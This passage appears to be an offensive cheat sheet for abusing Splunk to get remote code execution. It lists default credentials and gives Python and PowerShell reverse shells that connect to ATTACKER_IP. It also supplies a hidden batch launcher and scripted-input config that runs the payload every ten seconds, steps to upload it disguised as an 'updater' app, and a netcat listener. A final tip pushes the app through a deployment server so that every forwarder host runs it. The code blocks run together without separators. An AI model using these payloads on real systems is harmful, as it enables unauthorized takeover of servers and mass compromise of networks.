- Default port: 8000
- Often runs as root (Linux) or SYSTEM (Windows)
- Default creds:
admin:changeme
mkdir -p splunk_shell/bin splunk_shell/defaultimport sys,socket,os,pty
ip="ATTACKER_IP"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell
[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10# Create tarball
tar -cvzf updater.tar.gz splunk_shell/
# Upload via Splunk Web UI
# Apps → Install app from file → Uploadnc -lvnp 443If compromised host is a deployment server:
# Place app in deployment-apps for mass RCE
$SPLUNK_HOME/etc/deployment-apps/All hosts with Universal Forwarders will execute the payload.